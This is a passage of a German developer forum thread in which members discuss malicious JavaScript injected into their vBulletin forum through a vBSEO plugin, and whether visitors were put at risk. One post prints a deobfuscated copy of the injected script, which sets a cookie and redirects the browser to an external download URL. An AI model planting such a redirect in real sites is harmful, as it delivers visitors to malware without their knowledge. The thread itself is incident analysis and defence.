AGB  ·  Datenschutz  ·  Impressum  







Anmelden
Nützliche Links
Registrieren
Thema durchsuchen
Ansicht
Themen-Optionen

Fehler in der DP? (FileStore73.com)

Ein Thema von Linor · begonnen am 4. Aug 2010 · letzter Beitrag vom 20. Jan 2011
Antwort Antwort
Seite 2 von 3     12 3      
Benutzerbild von Sherlock
Sherlock

Registriert seit: 10. Jan 2006
Ort: Offenbach
3.763 Beiträge
 
Delphi 11 Alexandria
 
#11

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:41
Nicht gut...gar nicht gut. Aber Doktor D. macht das schon.

Für diejenigen, die sich nicht vorstellen können, was so garstig daran ist, hier mal ein nicht ganz so trockener Artikel zum Thema:
http://www.heise.de/security/artikel...t-1017983.html

Sherlock
Oliver
Geändert von Sherlock (Morgen um 16:78 Uhr) Grund: Weil ich es kann
  Mit Zitat antworten Zitat
Daniel
(Co-Admin)

Registriert seit: 30. Mai 2002
Ort: Hamburg
13.919 Beiträge
 
Delphi 10.4 Sydney
 
#12

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:47
Jein. Panik wäre zuviel des Guten.

Das Problem ist bekannt und vBSEO (der Hersteller der SEO-Erweiterung für vBulletin) und InternetBrands (Hersteller von vBulletin) schieben sich gegenseitig den schwarzen Peter hin und her.


Der Code "versteckt" sich in einem Plugin von vBSEO und wenn man dort einen bestimmten Cache neu aufbaut, ist der Code auch erst mal weg. Toll ist das keinesfalls, dennoch ich das Eindringen offenbar auf genau diese eine Stelle beschränkt: Es gab bis heute keine anderen Vorkommen dieses Codes. Ich werde schauen, dass ich eine Script-Lösung entwickle, die den Schadcode erkennt und dann bei Bedarf löscht.
Daniel R. Wolf
mit Grüßen aus Hamburg
  Mit Zitat antworten Zitat
blackfin
(Gast)

n/a Beiträge
 
#13

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:51
Jetzt mal eine doofe Frage, weil ich mich mit dem Zeug nicht so auskenne:
Konnte das gefährlich für den eigenen Rechner gewesen sein, wenn man einmal auf diese ominöse Seite gelinkt wurde?
  Mit Zitat antworten Zitat
mkinzler
(Moderator)

Registriert seit: 9. Dez 2005
Ort: Heilbronn
39.851 Beiträge
 
Delphi 11 Alexandria
 
#14

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:53
Vielleicht bevor der entsprechende Download gelöscht wurde.
Markus Kinzler
  Mit Zitat antworten Zitat
Benutzerbild von Valle
Valle

Registriert seit: 26. Dez 2005
Ort: Karlsruhe
1.223 Beiträge
 
#15

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:55
Jetzt mal eine doofe Frage, weil ich mich mit dem Zeug nicht so auskenne:
Konnte das gefährlich für den eigenen Rechner gewesen sein, wenn man einmal auf diese ominöse Seite gelinkt wurde?
So wie es ist seit ich es gesehen habe nicht. Wenn du natürlich den angegebenen Download wirklich runtergeladen und ausgeführt hast (falls es eine .exe war), dannn möglicherweise schon. Aber normalerweise reicht ein wenig Köpfchen aus, um sowas als ungefährlich zu begegnen.

Liebe Grüße,
Valle
Valentin Voigt
BOFH excuse #423: „It's not RFC-822 compliant.“
Mein total langweiliger Blog
  Mit Zitat antworten Zitat
blackfin
(Gast)

n/a Beiträge
 
#16

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:56
Sowas mache ich generell nicht
Danke für die Antworten!
  Mit Zitat antworten Zitat
Benutzerbild von littleDave
littleDave

Registriert seit: 27. Apr 2006
Ort: München
556 Beiträge
 
Delphi 7 Professional
 
#17

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:59
Ich habe mir eben mal die Mühe gemacht und den JavaScript-Source "etwas" umgeschrieben. Weiß nicht, ob alles so stimmt:
Code:
var consts = ["getTime", "setTime", "; expires=", "toGMTString", "cookie", "=", "; path=/", "vbsp", "1", "location", "http://filestore73.com/download.php?id="];
   
   
   function ipbcc(arg0, arg1)
   {
      // new Date
      var newDate = new Date;
     
      // newDate["setTime"](newDate["getTime"]() + 86400000);    
      newDate[consts[1]](newDate[consts[0]]() + 86400000);
     
      // newVar = "; expires=" + newDate["toGMTString"]();
      var newVar = consts[2] + newDate[consts[3]]();
     
      // arg0 = "vbsp"
      // arg1 = "1"
      // document["cookie"] = "vbsp" + "=" + "1" + newVar + "; path=/";
      document[consts[4]] = arg0 + consts[5] + arg1 + newVar + consts[6];
   }
   
   // ipbcc("vbsp", "1");
   ipbcc(consts[7], consts[8]);
   // document["location"] = http://filestore73.com/download.php?id=" + vbsp
   document[consts[9]] = consts[10] + vbsp;
Jedenfalls speichert das Script ein Cookie mit dem Namen "vbsp", der nach einem Tag abläuft. Vielleicht sollte man den lieber im Browser löschen.

Gruß
Jabber: littleDave@jabber.org
in case of 1 is 0 do external raise while in public class of object array else repeat until 1 is 0
  Mit Zitat antworten Zitat
Benutzerbild von Valle
Valle

Registriert seit: 26. Dez 2005
Ort: Karlsruhe
1.223 Beiträge
 
#18

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 16:01
[...] Vielleicht sollte man den lieber im Browser löschen.
Ich würde ihn eher auf 1 Jahr verlängern. Nur wenn dieser Keks gesetzt ist, wird dir der JavaScript-Code untergeschoben. Anders bekommst du die Standard-DP zu sehen.

Edit:// Quelle zu Daniels Aussage.

Liebe Grüße,
Valle
Valentin Voigt
BOFH excuse #423: „It's not RFC-822 compliant.“
Mein total langweiliger Blog

Geändert von Valle ( 4. Aug 2010 um 16:11 Uhr)
  Mit Zitat antworten Zitat
Benutzerbild von Sherlock
Sherlock

Registriert seit: 10. Jan 2006
Ort: Offenbach
3.763 Beiträge
 
Delphi 11 Alexandria
 
#19

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 16:19
Ich würde gerne Valle korrigieren und Blackfin verunsichern
In diesem konkreten Fall scheint nix schlimmes zu passieren. Aber wenn man sich doch mal den von mir geposteten Link zu Gemüte führt, erkennt man, daß eben nicht eine EXE geladen werden muss, deren Start eine Bestätigung des Anwenders erfordert. Man geht heutzutage anders vor (schließlich will man ja die Nerven der Vista-User schonen).

Sherlock
Oliver
Geändert von Sherlock (Morgen um 16:78 Uhr) Grund: Weil ich es kann
  Mit Zitat antworten Zitat
blackfin
(Gast)

n/a Beiträge
 
#20

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 16:22

Mhm, aber der Link gilt ja für den Internet Exploder, und wer surft schon damit (Hoëcker, sie sind raus!)
  Mit Zitat antworten Zitat
Antwort Antwort
Seite 2 von 3     12 3      


Forumregeln

Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus

Gehe zu:

Impressum · AGB · Datenschutz · Nach oben
Alle Zeitangaben in WEZ +1. Es ist jetzt 00:40 Uhr.
Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024 by Thomas Breitkreuz